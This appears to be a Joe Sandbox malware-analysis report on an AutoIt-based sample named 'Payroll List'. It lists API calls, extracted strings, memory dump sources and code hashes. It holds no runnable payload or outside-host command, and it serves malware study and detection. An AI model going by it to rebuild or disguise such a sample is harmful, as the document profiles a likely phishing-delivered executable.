                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction Fuzzy Hash: AC019278A00209EFCB44DF98C5909AEF7B5FB48310F248599EC19A7701DB30AE41EB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 0017A2FE
                                                                    • DeleteObject.GDI32(00000000), ref: 0017A310
                                                                    • DestroyWindow.USER32 ref: 0017A31E
                                                                    • GetDesktopWindow.USER32 ref: 0017A338
                                                                    • GetWindowRect.USER32(00000000), ref: 0017A33F
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0017A480
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0017A490
                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A4D8
                                                                    • GetClientRect.USER32(00000000,?), ref: 0017A4E4
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0017A51E
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A540
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A553
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A55E
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0017A567
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A576
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0017A57F
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A586
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0017A591
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A5A3
                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,001AD9BC,00000000), ref: 0017A5B9
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0017A5C9
                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0017A5EF
                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0017A60E
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A630
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0017A81D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: 151c939a556cbbc55899e3877f10cac8050274db27b40d4f2efc905222d94cbf
                                                                    • Instruction ID: cd115e7960a2a93a6e6ab73ee349b256813afa9811c0d4297c89dee796173d2e
                                                                    • Opcode Fuzzy Hash: 151c939a556cbbc55899e3877f10cac8050274db27b40d4f2efc905222d94cbf
                                                                    • Instruction Fuzzy Hash: 85027F71900254EFDB14DFA4DD89EAE7BB9FF49310F048158F90AAB6A0D7709D81CB61
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0018D2DB
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0018D30C
                                                                    • GetSysColor.USER32(0000000F), ref: 0018D318
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0018D332
                                                                    • SelectObject.GDI32(?,00000000), ref: 0018D341
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0018D36C
                                                                    • GetSysColor.USER32(00000010), ref: 0018D374
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0018D37B
                                                                    • FrameRect.USER32(?,?,00000000), ref: 0018D38A
                                                                    • DeleteObject.GDI32(00000000), ref: 0018D391
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0018D3DC
                                                                    • FillRect.USER32(?,?,00000000), ref: 0018D40E
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0018D439
                                                                      • Part of subcall function 0018D575: GetSysColor.USER32(00000012), ref: 0018D5AE
                                                                      • Part of subcall function 0018D575: SetTextColor.GDI32(?,?), ref: 0018D5B2
                                                                      • Part of subcall function 0018D575: GetSysColorBrush.USER32(0000000F), ref: 0018D5C8
                                                                      • Part of subcall function 0018D575: GetSysColor.USER32(0000000F), ref: 0018D5D3
                                                                      • Part of subcall function 0018D575: GetSysColor.USER32(00000011), ref: 0018D5F0
                                                                      • Part of subcall function 0018D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0018D5FE
                                                                      • Part of subcall function 0018D575: SelectObject.GDI32(?,00000000), ref: 0018D60F
                                                                      • Part of subcall function 0018D575: SetBkColor.GDI32(?,00000000), ref: 0018D618
                                                                      • Part of subcall function 0018D575: SelectObject.GDI32(?,?), ref: 0018D625
                                                                      • Part of subcall function 0018D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0018D644
                                                                      • Part of subcall function 0018D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0018D65B
                                                                      • Part of subcall function 0018D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0018D670
                                                                      • Part of subcall function 0018D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0018D698
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 3521893082-0
                                                                    • Opcode ID: 64a5b5dd55fa74eea9f58bd87917ae26aa846dc71db11d792f80ccedb3e826a4
                                                                    • Instruction ID: f13bdd1ddbef8cf4a7e730f4152ad3ef4007609a9d674cfafcb294618f7fad68
                                                                    • Opcode Fuzzy Hash: 64a5b5dd55fa74eea9f58bd87917ae26aa846dc71db11d792f80ccedb3e826a4
                                                                    • Instruction Fuzzy Hash: 7A917E71408701BFC710AF64EC48E6BBBB9FB86325F100A19F962969E0D771D984CF52
                                                                    APIs
                                                                    • DestroyWindow.USER32 ref: 0013B98B
                                                                    • DeleteObject.GDI32(00000000), ref: 0013B9CD
                                                                    • DeleteObject.GDI32(00000000), ref: 0013B9D8
                                                                    • DestroyIcon.USER32(00000000), ref: 0013B9E3
                                                                    • DestroyWindow.USER32(00000000), ref: 0013B9EE
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0019D2AA
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0019D2E3
                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0019D711
                                                                      • Part of subcall function 0013B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0013B759,?,00000000,?,?,?,?,0013B72B,00000000,?), ref: 0013BA58
                                                                    • SendMessageW.USER32 ref: 0019D758
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0019D76F
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0019D785
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0019D790
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 464785882-4108050209
                                                                    • Opcode ID: b07593bbd9f3d1d3d417a3434cc955f11213579cc281580a747090eb8fea1fdc
                                                                    • Instruction ID: e852589a9e33775459bd6b69f0ef4db72f4c58e66fe0d66bdf2ab3038b2db84a
                                                                    • Opcode Fuzzy Hash: b07593bbd9f3d1d3d417a3434cc955f11213579cc281580a747090eb8fea1fdc
                                                                    • Instruction Fuzzy Hash: 98129D70608601DFDB15CF28E884BA9BBF5FF15308F144569EA89CBA62D731EC85CB91
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0016DBD6
                                                                    • GetDriveTypeW.KERNEL32(?,001BDC54,?,\\.\,001BDC00), ref: 0016DCC3
                                                                    • SetErrorMode.KERNEL32(00000000,001BDC54,?,\\.\,001BDC00), ref: 0016DE29
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: e925c04ecfce34990ee9daa7bba5a7038954a827bb5074828e1f60e299e5f963
                                                                    • Instruction ID: 9fd23dd4fd3d5af97e1a37d6e573266268a2424cd6d74880c1fe9a0cd94a57ff
                                                                    • Opcode Fuzzy Hash: e925c04ecfce34990ee9daa7bba5a7038954a827bb5074828e1f60e299e5f963
                                                                    • Instruction Fuzzy Hash: 9851B130B08302ABC214EF68EC82C29B7A1FBA4745B11496BF467972D1DB71D975D783
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-86951937
                                                                    • Opcode ID: 9dc0a6cbbe0c8ab9da5eaab74e0a22363b767d175b8ccbefcd110b835f6d1aed
                                                                    • Instruction ID: 2794814d7e2459c05cb05b4c208eecd89363cc82d543dfc019f4068610f02edf
                                                                    • Opcode Fuzzy Hash: 9dc0a6cbbe0c8ab9da5eaab74e0a22363b767d175b8ccbefcd110b835f6d1aed
                                                                    • Instruction Fuzzy Hash: D581FB31640229BBCB25ABA4EC82FBF7768EF74300F044029FA05A61C6E771D965C6D5
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0018C788
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0018C83E
                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0018C859
                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0018CB15
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: 0
                                                                    • API String ID: 2326795674-4108050209
                                                                    • Opcode ID: 0afb41670ba0ec6fd6bc3a78e71a8a1dcd813ce06674cdc8725856d3c3359bc6
                                                                    • Instruction ID: 11809fea0039c64bd1745d8ab044c3a91646f4336b6667cebabb87f64a7e5fc3
                                                                    • Opcode Fuzzy Hash: 0afb41670ba0ec6fd6bc3a78e71a8a1dcd813ce06674cdc8725856d3c3359bc6
                                                                    • Instruction Fuzzy Hash: 69F10270104741AFE725AF24C885BAABBE4FF4A354F08062DF589D66A1D774CA84CFE1
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,001BDC00), ref: 00186449
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                    • API String ID: 3964851224-45149045
                                                                    • Opcode ID: 2c971e54be6492b74e5c3d9cd567d0736652b8d5b83159eb1654d579459e65c1
                                                                    • Instruction ID: 0d8472265db813b027831b1b392107f74ecc78302b7b412e37a1e7e324cd7fc1
                                                                    • Opcode Fuzzy Hash: 2c971e54be6492b74e5c3d9cd567d0736652b8d5b83159eb1654d579459e65c1
                                                                    • Instruction Fuzzy Hash: 1FC182302043458BCB04FF14D591A6E77E5AFA5344F144859F89A6B3E2EB30EE4ACF82
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 0018D5AE
                                                                    • SetTextColor.GDI32(?,?), ref: 0018D5B2
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0018D5C8
                                                                    • GetSysColor.USER32(0000000F), ref: 0018D5D3
                                                                    • CreateSolidBrush.GDI32(?), ref: 0018D5D8
                                                                    • GetSysColor.USER32(00000011), ref: 0018D5F0
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0018D5FE
                                                                    • SelectObject.GDI32(?,00000000), ref: 0018D60F
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0018D618
                                                                    • SelectObject.GDI32(?,?), ref: 0018D625
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0018D644
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0018D65B
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0018D670
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0018D698
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0018D6BF
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0018D6DD
                                                                    • DrawFocusRect.USER32(?,?), ref: 0018D6E8
                                                                    • GetSysColor.USER32(00000011), ref: 0018D6F6
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0018D6FE
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0018D712
                                                                    • SelectObject.GDI32(?,0018D2A5), ref: 0018D729
                                                                    • DeleteObject.GDI32(?), ref: 0018D734
                                                                    • SelectObject.GDI32(?,?), ref: 0018D73A
                                                                    • DeleteObject.GDI32(?), ref: 0018D73F
                                                                    • SetTextColor.GDI32(?,?), ref: 0018D745
                                                                    • SetBkColor.GDI32(?,?), ref: 0018D74F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: db1eedb7356e0f2fcfb1b857a5d9ef882335f42a61cab5a06dedd90067daaa5b
                                                                    • Instruction ID: 3baf0f1f7c0a905ea536068d9315d7ae9622f8b9e4b4b88551c144c4688c9381
                                                                    • Opcode Fuzzy Hash: db1eedb7356e0f2fcfb1b857a5d9ef882335f42a61cab5a06dedd90067daaa5b
                                                                    • Instruction Fuzzy Hash: 0D513B71900608BFDB10AFA8EC48EAE7B79EB09324F214515F916AB6E1D7719A80CF50
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0018B7B0
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0018B7C1
                                                                    • CharNextW.USER32(0000014E), ref: 0018B7F0
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0018B831
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0018B847
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0018B858
                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0018B875
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0018B8C7
                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0018B8DD
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0018B90E
                                                                    • _memset.LIBCMT ref: 0018B933
                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0018B97C
                                                                    • _memset.LIBCMT ref: 0018B9DB
                                                                    • SendMessageW.USER32 ref: 0018BA05
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0018BA5D
                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0018BB0A
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0018BB2C
                                                                    • GetMenuItemInfoW.USER32(?), ref: 0018BB76
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0018BBA3
                                                                    • DrawMenuBar.USER32(?), ref: 0018BBB2
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0018BBDA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                    • String ID: 0
                                                                    • API String ID: 1073566785-4108050209
                                                                    • Opcode ID: db7baef776f1830123d1e1d251fc8a09dbe03d0932644b5a8571a19362f3a2ba
                                                                    • Instruction ID: eef717cb239ad5634f4c78de041529ffee4ec8f466d0c9eff85f6db07325c933
                                                                    • Opcode Fuzzy Hash: db7baef776f1830123d1e1d251fc8a09dbe03d0932644b5a8571a19362f3a2ba
                                                                    • Instruction Fuzzy Hash: 96E1AF71904219ABDF20EFA5DCC4EEE7BB8FF05714F148156F919AA290D7708A81DF60
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 0018778A
                                                                    • GetDesktopWindow.USER32 ref: 0018779F
                                                                    • GetWindowRect.USER32(00000000), ref: 001877A6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00187808
                                                                    • DestroyWindow.USER32(?), ref: 00187834
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0018785D
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018787B
                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001878A1
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 001878B6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001878C9
                                                                    • IsWindowVisible.USER32(?), ref: 001878E9
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00187904
                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00187918
                                                                    • GetWindowRect.USER32(?,?), ref: 00187930
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00187956
                                                                    • GetMonitorInfoW.USER32 ref: 00187970
                                                                    • CopyRect.USER32(?,?), ref: 00187987
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 001879F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 70fd286146b1f434bb83e0b7258f16317207324b2cf6f128eade44e14f7cf7d7
                                                                    • Instruction ID: 0e00aa33dabcf1b036d5ff76ae409223f5e45d85accf7fb86f0ec77fe8b99730
                                                                    • Opcode Fuzzy Hash: 70fd286146b1f434bb83e0b7258f16317207324b2cf6f128eade44e14f7cf7d7
                                                                    • Instruction Fuzzy Hash: 78B1B171608300AFDB04EF64D849B6ABBE4FF99314F10891DF59A9B291D770E944CF92
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00166CFB
                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00166D21
                                                                    • _wcscpy.LIBCMT ref: 00166D4F
                                                                    • _wcscmp.LIBCMT ref: 00166D5A
                                                                    • _wcscat.LIBCMT ref: 00166D70
                                                                    • _wcsstr.LIBCMT ref: 00166D7B
                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00166D97
                                                                    • _wcscat.LIBCMT ref: 00166DE0
                                                                    • _wcscat.LIBCMT ref: 00166DE7
                                                                    • _wcsncpy.LIBCMT ref: 00166E12
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
